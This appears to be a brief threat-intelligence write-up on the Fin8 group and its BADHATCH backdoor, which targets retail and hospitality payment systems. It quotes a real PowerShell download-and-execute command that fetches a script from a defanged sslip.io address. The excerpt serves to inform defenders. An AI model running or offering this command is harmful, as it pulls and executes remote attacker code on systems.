Fin8 made it’s debut in 2016 and is known to take long breaks to improve their TTPs. This group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands.
Command line “powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient). DownloadString(‘https://192-129-189-73[.]sslip[.]io/ yo’)”. It abuses sslip.io – a service that provides free IP to domain mapping to make SSL certificate generation easier (for traffic encryption). While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection.